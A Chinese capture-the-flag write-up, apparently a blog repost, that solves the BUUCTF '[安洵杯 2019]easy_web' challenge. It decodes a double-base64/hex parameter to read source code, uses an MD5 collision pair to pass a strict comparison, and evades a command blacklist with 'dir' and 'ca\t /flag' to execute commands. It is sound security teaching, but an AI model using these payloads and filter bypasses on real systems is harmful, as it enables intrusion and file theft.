2. 程式人生 > 實用技巧 >[安洵杯 2019]easy_web

[安洵杯 2019]easy_web

阿新 發佈:2020-07-12

檢視URL,發現img引數後面應該是base64加密,嘗試解碼

http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd

base64解密-》base64解密-》hex進位制轉換

MzUzNTM1MmU3MDZlNj
3535352e706e
555.pn

可以猜測img引數可能存在檔案包含漏洞,將index.php進行加密
text轉化為hex-》base64加密-》base64加密

696E6465782E706870
Njk2RTY0NjU3ODJFNzA2ODcw
TmprMlJUWTBOalUzT0RKRk56QTJPRGN3

輸入加密後的URL,右鍵檢視原始碼將base64部分進行解碼便可得到程式碼

http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=
 1 <?php
 2 error_reporting(E_ALL || ~ E_NOTICE);
 3 header('content-type:text/html;charset=utf-8');
 4 $cmd = $_GET['cmd'];
 5 if (!isset($_GET['img']) || !isset
 
($_GET['cmd'])) 
 6     header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
 7 $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
 8 
 9 $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
10 if (preg_match("/flag/i", $file)) {
11     echo '<img src ="./ctf3.jpeg">';

 
12     die("xixi~ no flag");
13 } else {
14     $txt = base64_encode(file_get_contents($file));
15     echo "<img src='data:image/gif;base64," . $txt . "'></img>";
16     echo "<br>";
17 }
18 echo $cmd;
19 echo "<br>";
20 if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
21     echo("forbid ~");
22     echo "<br>";
23 } else {
24     if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
25         echo `$cmd`;
26     } else {
27         echo ("md5 is funny ~");
28     }
29 }
30 
31 ?>
32 <html>
33 <style>
34   body{
35    background:url(./bj.png)  no-repeat center center;
36    background-size:cover;
37    background-attachment:fixed;
38    background-color:#CCCCCC;
39 }
40 </style>
41 <body>
42 </body>
43 </html>

程式碼第20行過濾了系統命令等關鍵字,但是沒有過濾dir。程式碼第24行可以發現比較md5時,進行了強制型別轉換。

MD5強型別的繞過

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

輸入如下URL,執行dir命令

http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=&cmd=dir

右鍵檢視原始碼,發現flag並沒有在當前目錄下

根目錄查詢,發現flag檔案

http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=&cmd=dir /

因為過濾了cat,但是可以通過\反斜槓進行繞過

http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=&cmd=ca\t /flag

相關推薦

[ 2019]easy_web

檢視URL,發現img引數後面應該是base64加密,嘗試解碼 http://0ec6d84a-930a-4d8a-8aeb-10862f2da5ee.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd

反序列化中的物件逃逸——2019 easy_serialize_php

一週沒寫部落格了,這裡簡單梳理一下反序列化的普遍知識點 反序列化的物件逃逸問題一般分為兩種~~,我先談一下自己的理解,首先是過濾函式分為兩種情況

刷題[ 2019]不是檔案上傳

解題思路 這不是檔案上傳嘛? 傳傳傳,各種傳 檔案上傳 1.MIME型別檢測繞過 設定為image/jpeg,無果

BUUCTF-[ 2019]不是檔案上傳 wp

知識點:github原始碼洩露、程式碼審計、php反序列化 進入頁面後發現可以進行檔案上傳,嘗試上傳了一個1.txt檔案後報錯,於是上傳1.jpg檔案,顯示上傳成功後進入show.php檢視,發現檔案被重新命名

CTF程式碼審計之[ 2019]easy_serialize_php

[ 2019]easy_serialize_php 考點:php反序列化逃逸 <?php $function = @$_GET[\'f\']; function filter($img){

BUUCTF Misc [ 2019]Attack

BUUCTF Misc [ 2019]Attack 流量分析題,學到了一個新工具mimikatz mimikatz 在內網滲透中是個很有用的工具。它可能讓攻擊者從記憶體中抓到明文密碼。

[ 2019]easy_serialize_php

easy_serialize_php 考點:PHP反序列化的物件逃逸 PS:任何具有一定結構的資料,只要經過了某些處理把自身結構改變,則可能會產生漏洞

BUU MISC刷題記錄 [ 2019]Attack

[ 2019]Attack 知識點 流量分析 lsass.dmp 做題過程 開啟流量包 流量包中有大量http、tcp包和一部分nbns、arp包,先看傳輸的東西有沒有問題

BUUCTF 2019吹著貝斯掃二維碼

吹著貝斯掃二維碼 1.題目概述 2.解題過程 開啟flag.zip看看 是個加密的zip,在註釋裡有一串貌似是base32的編碼,可能是密碼

2019第二屆MISC-secret

1,題目給了一個dump記憶體映象,使用volatility進行分析   (記憶體映象最好與volatility在同一目錄下)

2020年“”四川省大學生資訊保安技術大賽 Misc WP

一封情書 檔案下載:https://wwa.lanzous.com/ie6Ysgfblsb 01轉換 開啟總共9409,實際就是97x97的二值影象的值。利用Python提取txt檔案中的01數值為97x97的矩陣

淺談Phar反序列化漏洞利用:N1CTF 2021 easyphp & 2021 EZ_TP

Phar 什麼是Phar PHp ARchive, like a Java JAR, but for PHP. phar(PHp ARchive)是類似於JAR的一種打包檔案。PHP ≥5.3對Phar字尾檔案是預設開啟支援的,不需要任何其他的安裝就可以使用它。

2021--pwn ezstack

ezstack 檢視保護 發現是64位保護全開。 拖進ida檢視 可以看到明顯的格式化字串漏洞和棧溢位

2022 pwn babyarm

上週剛學習了一下arm下的pwn,這次就碰到了 ​ 32位,開了NX、relro部分開啟 ​ 程式前面有個加密,當我們輸入的內容加密後與\"Sp5jS6mpH6LZC6GqSWe=\"相同,程式會給我們一個能來進行棧溢位read

第十屆藍橋2019年C/C++ 大學A組省賽試題

試題 A: 平方和 本題總分:5 分 【問題描述】 小明對數位中含有 2、0、1、9 的數字很感興趣,在 1 到 40 中這樣的數包括 1、2、9、10 至 32、39 和 40,共 28 個,他們的和是 574,平方和是 14362。注意,平方和是指

[強網 2019]隨便注 1 【BUUCFT】【SQL注入】

參考教程: 簡簡的我 方法一 判斷是否存在注入,注入是字元型還是數字型 輸入 1’ 發現不回顯

BUUCTF-[強網 2019]隨便注

解題 1、網頁標題是easy_sql 輸入1、2有回顯,其餘都無查詢結果 加單引號?inject=1\' 報錯

buuctf-web [強網 2019]隨便注 1

啟動靶機,開啟是這個介面 首先輸入1‘,它會報錯 然後輸入1\' order by 2,這說明只有兩個欄位。

第十屆藍橋2019年C/C++ 大學B組省賽試題

試題 A:組隊 本題總分:5分 【問題描述】 作為籃球隊教練,你需要從以下名單中選出 1號位至 5號位各一名球員,

藍橋2019年第十屆JavaB組真題題目+解析+程式碼+答案:6.特別數的和

技術標籤:2019第十屆省賽-javaB組-題目+題解字串python資料結構演算法正則表示式